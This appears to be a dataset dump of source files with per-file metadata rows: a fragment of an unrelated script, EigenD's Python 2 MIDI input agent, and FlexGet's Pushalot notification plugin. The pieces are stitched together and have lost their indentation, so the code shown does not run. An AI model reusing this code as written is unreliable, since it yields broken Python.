print(" : overall accuracy:", 10 * sallacc)
print(" : words known:", 10 * sknown)
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE)
| mit | -6,458,898,123,796,336,000 | 29.304778 | 92 | 0.545692 | false |
barnone/EigenD | plg_midi/midi_input_plg.py | 1 | 16450 |
#
# Copyright 2009 Eigenlabs Ltd. http://www.eigenlabs.com
#
# This file is part of EigenD.
#
# EigenD is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# EigenD is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EigenD. If not, see <http://www.gnu.org/licenses/>.
#
import os
import picross
import piw
from pi import atom,bundles,domain,agent,logic,utils,node,action,async,upgrade
from . import midi_input_version as version,midi_native
class VirtualKey(atom.Atom):
def __init__(self):
atom.Atom.__init__(self,names='key',protocols='virtual')
self.choices=[]
def __key(self,*keys):
x = ','.join(['cmp([dsc(~(parent)"#1","%(k)d")])' % dict(k=k) for k in keys])
return '[%s]' % x
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
print 'resolving virtual',arg,(a,o)
if not a and o is None: return self.__key(*range(0,128))
if a==('chosen',) and o is None: return self.__key(*self.choices)
if a or o is None: return self.__key()
o=int(o)
if o<0 or o>127: return self.__key()
return self.__key(o)
class VirtualCC(atom.Atom):
clist = (
('bank select coarse', 0), ('modulation wheel coarse', 1), ('breath controller coarse', 2), ('foot pedal coarse', 4),
('portamento time coarse', 5), ('data entry coarse', 6), ('volume coarse', 7), ('balance coarse', 8),
('pan position coarse', 10), ('expression coarse', 11), ('effect control 1 coarse', 12), ('effect control 2 coarse', 13),
('general purpose slider 1', 16), ('general purpose slider 2', 17), ('general purpose slider 3', 18), ('general purpose slider 4', 19),
('bank select fine', 32), ('modulation wheel fine', 33), ('breath controller fine', 34), ('foot pedal fine', 36),
('portamento time fine', 37), ('data entry fine', 38), ('volume fine', 39), ('balance fine', 40),
('pan position fine', 42), ('expression fine', 43), ('effect control 1 fine', 44), ('effect control 2 fine', 45),
('hold pedal', 64), ('portamento', 65), ('sustenuto pedal', 66), ('soft pedal', 67),
('legato pedal', 68), ('hold 2 pedal', 69), ('sound variation', 70), ('sound timbre', 71),
('sound release time', 72), ('sound attack time', 73), ('sound brightness', 74), ('sound control 6', 75),
('sound control 7', 76), ('sound control 8', 77), ('sound control 9', 78), ('sound control 10', 79),
('general purpose button 1', 80), ('general purpose button 2', 81), ('general purpose button 3', 82), ('general purpose button 4', 83),
('effects level', 91), ('tremulo level', 92), ('chorus level', 93), ('celeste level', 94),
('phaser level', 95), ('data button increment', 96), ('data button decrement', 97), ('non-registered parameter fine', 98),
('non-registered parameter coarse', 99), ('registered parameter fine', 100), ('registered parameter coarse', 101), ('all sound off', 120),
('all controllers off', 121), ('local keyboard', 122), ('all notes off', 123), ('omni mode off', 124),
('omni mode on', 125), ('mono operation', 126), ('poly operation', 127))
cdict = dict(clist)
def __init__(self):
atom.Atom.__init__(self,names='continuous controller',protocols='virtual browse')
self.__selected=None
def rpc_setselected(self,arg):
print 'VirtualCC:setselected',arg
def rpc_activated(self,arg):
print 'VirtualCC:activated',arg
return logic.render_term(('',''))
def rpc_current(self,arg):
return '[]'
def __key(self,*keys):
x = ','.join(['cmp([dsc(~(parent)"#2","%(k)d")])' % dict(k=k) for k in keys])
return '[%s]' % x
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
a = (' '.join(a)).lower()
print 'midi cc resolving',a,o
if a in self.cdict: return self.__key(self.cdict[a])
a2 = a+' coarse'
if a2 in self.cdict: return self.__key(self.cdict[a2])
if not a and o is None: return self.__key(*range(0,128))
if a or o is None: return self.__key()
o=int(o)
if o<0 or o>127: return self.__key()
print 'resolved to',self.__key(o)
return self.__key(o)
def rpc_enumerate(self,a):
return logic.render_term((len(self.clist),0))
def rpc_cinfo(self,a):
return '[]'
def rpc_finfo(self,a):
(path,idx) = logic.parse_clause(a)
map = tuple([ (str(s),'cc %d: %s' % (s,n),None) for (n,s) in self.clist[idx:] ])
return logic.render_term(map)
def rpc_fideal(self,arg):
try:
(path,cookie) = logic.parse_clause(arg)
cookie=int(cookie)
except:
utils.log_exception()
return async.failure('invalid cookie')
for name,val in self.clist:
if cookie==val:
return 'cmp([dsc(~(parent)"#2",%d)])' % val
return async.failure('invalid cookie')
class VirtualProgramChange(atom.Atom):
def __init__(self):
atom.Atom.__init__(self,names='program change',protocols='virtual')
self.choices=[]
def __key(self,*keys):
x = ','.join(['cmp([dsc(~(parent)"#8","%(k)d")])' % dict(k=k) for k in keys])
return '[%s]' % x
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
print 'resolving virtual',arg,(a,o)
if not a and o is None: return self.__key(*range(0,128))
if a==('chosen',) and o is None: return self.__key(*self.choices)
if a or o is None: return self.__key()
o=int(o)
if o<0 or o>127: return self.__key()
return self.__key(o)
class VirtualTrigger(atom.Atom):
def __init__(self):
atom.Atom.__init__(self,names='trigger',protocols='virtual')
self.choices=[]
def __key(self,*keys):
x = ','.join(['cmp([dsc(~(parent)"#10","%(k)d")])' % dict(k=k) for k in keys])
return '[%s]' % x
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
print 'resolving virtual',arg,(a,o)
if not a and o is None: return self.__key(*range(0,128))
if a==('chosen',) and o is None: return self.__key(*self.choices)
if a or o is None: return self.__key()
o=int(o)
if o<0 or o>127: return self.__key()
return self.__key(o)
class MidiDelegate(midi_native.midi_input):
def __init__(self,key_cookie,cc_cookie,pc_cookie,trig_cookie,midi_cookie,notify):
midi_native.midi_input.__init__(self,key_cookie,cc_cookie,pc_cookie,trig_cookie,midi_cookie)
self.sources = []
self.__notify = notify
def source_added(self,id,name):
xid = '%x'%id
for i,(u,n) in enumerate(self.sources):
if u==xid:
print 'midi source changed',xid,name
self.sources[i] = (xid,name)
self.__notify()
return
print 'midi source added',xid,name
self.sources.append((xid,name))
self.__notify()
def source_removed(self,id):
xid = '%x'%id
for i,(u,n) in enumerate(self.sources):
if u==xid:
print 'midi source removed',xid,n
del self.sources[i]
self.__notify()
return
class MidiPort(atom.Atom):
def __init__(self, key_cookie,cc_cookie,pc_cookie,trig_cookie,midi_cookie):
self.__timestamp = piw.tsd_time()
self.__midi = MidiDelegate(key_cookie,cc_cookie,pc_cookie,trig_cookie,midi_cookie,self.__sinks_changed)
atom.Atom.__init__(self,domain=domain.String(),names='midi port',policy=atom.default_policy(self.setport),protocols='virtual browse')
self.__midi.setport(0)
self.__midi.set_destination('')
self.__selected=None
self.__update()
self.__index = 1
def set_index(self,index):
self.__index = index
if self.open():
self.__midi.set_destination('Eigenlabs %d' % self.__index)
def server_opened(self):
atom.Atom.server_opened(self)
self.__midi.set_destination('Eigenlabs %d' % self.__index)
self.__midi.run()
self.setport(self.get_value())
def close_server(self):
atom.Atom.close_server(self)
self.__midi.set_destination('')
self.__midi.setport(0)
self.__midi.stop()
def __update(self):
if not self.get_value() and len(self.__midi.sources):
port = self.__midi.sources[0][0]
self.__midi.setport(int(port,16))
self.__timestamp = self.__timestamp+1
self.set_property_string('timestamp',str(self.__timestamp))
def setport(self,port):
self.set_value(port)
self.__update()
if self.open():
print 'set port to',port
if port:
self.__midi.setport(int(port,16))
else:
if len(self.__midi.sources):
self.__midi.setport(int(self.__midi.sources[0][0],16))
def __sinks_changed(self):
self.setport(self.get_value())
def rpc_displayname(self,arg):
return 'MIDI input ports'
def rpc_setselected(self,arg):
(path,selected)=logic.parse_clause(arg)
print 'MidiPort:setselected',selected
self.__selected=selected
def rpc_activated(self,arg):
(path,selected)=logic.parse_clause(arg)
print 'MidiPort:activated',selected
port=selected
self.setport(port)
return logic.render_term(('',''))
def clear_trim(self):
self.__midi.clear_trim()
def set_trim(self,cc,min,max,inv):
self.__midi.set_trim(cc,min,max,inv)
def current(self,cc):
return self.__midi.current(cc)
def resolve_name(self,name):
if name=='selection':
# o=self.__selected
return self.__ideal(self.__selected)
else:
try:
o = int(name)
except:
return '[]'
if o>0 and o<len(self.__midi.sources)+1:
return self.__ideal(self.__midi.sources[o-1][0])
return '[]'
def __ideal(self,uid):
return '[ideal([~server,midiport],%s)]' % logic.render_term(uid)
def rpc_fideal(self,arg):
(path,cookie) = logic.parse_clause(arg)
for id,n in self.__midi.sources:
if id==cookie:
return 'ideal([~server,midiport],%s)' % logic.render_term(cookie)
return async.failure('invalid cookie')
def rpc_current(self,arg):
current = self.__midi.getport()
if current==0:
return '[]'
return '[["%x",[]]]' % current
def rpc_resolve(self,arg):
(a,o) = logic.parse_clause(arg)
if a or not o:
return '[]'
return self.resolve_name(o)
def rpc_enumerate(self,a):
return logic.render_term((len(self.__midi.sources),0))
def rpc_cinfo(self,a):
return '[]'
def rpc_finfo(self,a):
(dlist,cnum) = logic.parse_clause(a)
map = tuple([(uid,dsc,None) for (uid,dsc) in self.__midi.sources[cnum:]])
return logic.render_term(map)
class Agent(agent.Agent):
def __init__(self, address, ordinal):
agent.Agent.__init__(self,names='midi input',signature=version,container=6,ordinal=ordinal)
self.domain = piw.clockdomain_ctl()
self.domain.set_source(piw.makestring('*',0))
self.set_private(node.Server(value=piw.makestring('[]',0), change=self.__settrim))
self[1] = bundles.Output(1,False,names='key output')
self[2] = bundles.Output(1,False,names='continuous controller output')
self[8] = bundles.Output(1,False,names='program change output')
self[10] = bundles.Output(1,False,names='trigger output')
self.key_output = bundles.Splitter(self.domain,self[1])
self.cc_output = bundles.Splitter(self.domain,self[2])
self.programchange_output = bundles.Splitter(self.domain,self[8])
self.trigger_output = bundles.Splitter(self.domain,self[10])
self[6] = bundles.Output(1,False,names='midi output')
self[7] = bundles.Output(2,False,names='midi clock output')
self.midi_output = bundles.Splitter(self.domain,self[6],self[7])
self[3] = VirtualKey()
self[4] = VirtualCC()
self[9] = VirtualProgramChange()
self[11] = VirtualTrigger()
self[5] = MidiPort(self.key_output.cookie(),self.cc_output.cookie(),self.programchange_output.cookie(),self.trigger_output.cookie(),self.midi_output.cookie())
self.add_verb2(2,'choose([],None,role(None,[ideal([~server,midiport]),singular]))',self.__chooseport)
self.add_verb2(3,'invert([],None,role(None,[cmpdsc(~(s)"#2")]))', self.__invert);
self.add_verb2(4,'minimise([],None,role(None,[cmpdsc(~(s)"#2")]),option(to,[numeric]))', self.__setmin);
self.add_verb2(5,'maximise([],None,role(None,[cmpdsc(~(s)"#2")]),option(to,[numeric]))', self.__setmax);
self.set_ordinal(ordinal)
def property_change(self,key,value,delegate):
if key == 'ordinal':
self[5].set_index(self.get_property_long('ordinal',1))
def __settrim(self,val):
if val.is_string():
trim = logic.parse_clause(val.as_string())
self[5].clear_trim()
for (cc,min,max,inv) in trim:
self[5].set_trim(cc,min,max,inv)
print 'trim:',trim
self.get_private().set_data(val)
def get_trim(self,cc):
trim = logic.parse_clause(self.get_private().get_data().as_string())
for (tcc,min,max,inv) in trim:
if tcc==cc:
return list((tcc,min,max,inv))
return [cc,0,127,False]
def set_trim(self,cc,min,max,inv):
trim = list(logic.parse_clause(self.get_private().get_data().as_string()))
done = False
for (i,(tcc,tmin,tmax,tinv)) in enumerate(trim):
if tcc==cc:
trim[i] = (cc,min,max,inv)
done = True
if not done:
trim.append((cc,min,max,inv))
self[5].set_trim(cc,min,max,inv)
trim = logic.render_term(tuple(trim))
self.get_private().set_data(piw.makestring(trim,0))
def __invert(self,subj,arg):
cc = int(arg[0].args[0][0].args[1])
print 'invert controller',cc
trim = self.get_trim(cc)
trim[3] = not trim[3]
self.set_trim(*trim)
def __setmin(self,subj,arg,val):
cc = int(arg[0].args[0][0].args[1])
if val is None:
val=self[5].current(cc)
else:
val=int(action.abstract_string(val))
print 'set controller minimum',cc,val
trim = self.get_trim(cc)
trim[1] = val
if trim[1]<=trim[2]:
trim[3]=False
else:
trim[3]=True
a=trim[1]
trim[1]=trim[2]
trim[2]=a
self.set_trim(*trim)
def __setmax(self,subj,arg,val):
cc = int(arg[0].args[0][0].args[1])
if val is None:
val=self[5].current(cc)
else:
val=int(action.abstract_string(val))
print 'set controller maximum',cc,val
trim = self.get_trim(cc)
trim[2] = val
if trim[1]<=trim[2]:
trim[3]=False
else:
trim[3]=True
a=trim[1]
trim[1]=trim[2]
trim[2]=a
self.set_trim(*trim)
def rpc_resolve_ideal(self,arg):
(type,arg) = action.unmarshal(arg)
print 'resolving',arg
if type=='midiport':
return self[5].resolve_name(' '.join(arg))
return action.marshal(())
def __chooseport(self,subj,arg):
print 'choose port',arg
print action.arg_objects(arg)[0]
(type,thing) = action.crack_ideal(action.arg_objects(arg)[0])
print type,thing
self[5].setport(thing)
agent.main(Agent,gui=True)
| gpl-3.0 | -6,468,693,866,637,945,000 | 35.474501 | 166 | 0.569726 | false |
patsissons/Flexget | flexget/plugins/output/pushalot.py | 4 | 6342 | from __future__ import unicode_literals, division, absolute_import
import logging
from flexget import plugin
from flexget.event import event
from flexget.utils import json
from flexget.utils.template import RenderError
from flexget.config_schema import one_or_more
log = logging.getLogger("pushalot")
pushalot_url = "https://pushalot.com/api/sendmessage"
class OutputPushalot(object):
"""
Example::
pushalot:
token: <string> Authorization token (can also be a list of tokens) - Required
title: <string> (default: task name -- accepts Jinja2)
body: <string> (default: "{{series_name}} {{series_id}}" -- accepts Jinja2)
link: <string> (default: "{{imdb_url}}" -- accepts Jinja2)
linktitle: <string> (default: (none) -- accepts Jinja2)
important: <boolean> (default is False)
silent: <boolean< (default is False)
image: <string> (default: (none) -- accepts Jinja2)
source: <string> (default is "FlexGet")
timetolive: <integer> (no default sent, default is set by Pushalot)
Configuration parameters are also supported from entries (eg. through set).
"""
default_body = "{% if series_name is defined %}{{tvdb_series_name|d(series_name)}} " \
"{{series_id}} {{tvdb_ep_name|d('')}}{% elif imdb_name is defined %}{{imdb_name}} "\
"{{imdb_year}}{% else %}{{title}}{% endif %}"
schema = {
'type': 'object',
'properties': {
'token': one_or_more({'type': 'string'}),
'title': {'type': 'string', 'default': "Task {{task}}"},
'body': {'type': 'string', 'default': default_body},
'link': {'type': 'string', 'default': '{% if imdb_url is defined %}{{imdb_url}}{% endif %}'},
'linktitle': {'type': 'string', 'default': ''},
'important': {'type': 'boolean', 'default': False},
'silent': {'type': 'boolean', 'default': False},
'image': {'type': 'string', 'default': ''},
'source': {'type': 'string', 'default': 'FlexGet'},
'timetolive': {'type': 'integer', 'default': 0},
},
'required': ['token'],
'additionalProperties': False
}
# Run last to make sure other outputs are successful before sending notification
@plugin.priority(0)
def on_task_output(self, task, config):
# Support for multiple tokens
tokens = config["token"]
if not isinstance(tokens, list):
tokens = [tokens]
# Loop through the provided entries
for entry in task.accepted:
title = config["title"]
body = config["body"]
link = config["link"]
linktitle = config["linktitle"]
important = config["important"]
silent = config["silent"]
image = config["image"]
source = config["source"]
timetolive = config["timetolive"]
# Attempt to render the title field
try:
title = entry.render(title)
except RenderError as e:
log.warning("Problem rendering 'title': %s" % e)
title = "Download started"
# Attempt to render the body field
try:
body = entry.render(body)
except RenderError as e:
log.warning("Problem rendering 'body': %s" % e)
body = entry["title"]
# Attempt to render the link field
try:
link = entry.render(link)
except RenderError as e:
log.warning("Problem rendering 'link': %s" % e)
link = entry.get("imdb_url", "")
# Attempt to render the linktitle field
try:
linktitle = entry.render(linktitle)
except RenderError as e:
log.warning("Problem rendering 'linktitle': %s" % e)
linktitle = ""
try:
image = entry.render(image)
except RenderError as e:
log.warning("Problem rendering 'image': %s" % e)
image = ""
for token in tokens:
# Build the request
data = {"AuthorizationToken": token, "title": title, "body": body,
"link": link, "linktitle": linktitle, "important": important,
"silent": silent, "image": image, "source": source,
"timetolive": timetolive}
# Check for test mode
if task.options.test:
log.info("Test mode. Pushalot notification would be:")
log.info(" Title: %s" % title)
log.info(" body: %s" % body)
log.info(" link: %s" % link)
log.info(" link Title: %s" % linktitle)
log.info(" token: %s" % token)
log.info(" important: %s" % important)
log.info(" silent: %s" % silent)
log.info(" image: %s" % image)
log.info(" source: %s" % source)
log.info(" timetolive: %s" % timetolive)
# Test mode. Skip remainder.
continue
# Make the request
response = task.requests.post(pushalot_url, data=data, raise_status=False)
# Check if it succeeded
request_status = response.status_code
# error codes and bodys from Pushalot API
if request_status == 200:
log.debug("Pushalot notification sent")
elif request_status == 500:
log.debug("Pushalot notification failed, Pushalot API having issues")
# TODO: Implement retrying. API requests 5 seconds between retries.
elif request_status >= 400:
errors = json.loads(response.content)
log.error("Pushalot API error: %s" % errors['Description'])
else:
log.error("Unknown error when sending Pushalot notification")
@event('plugin.register')
def register_plugin():
plugin.register(OutputPushalot, "pushalot", api_ver=2)
| mit | 624,903,931,182,064,400 | 40.45098 | 105 | 0.52176 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.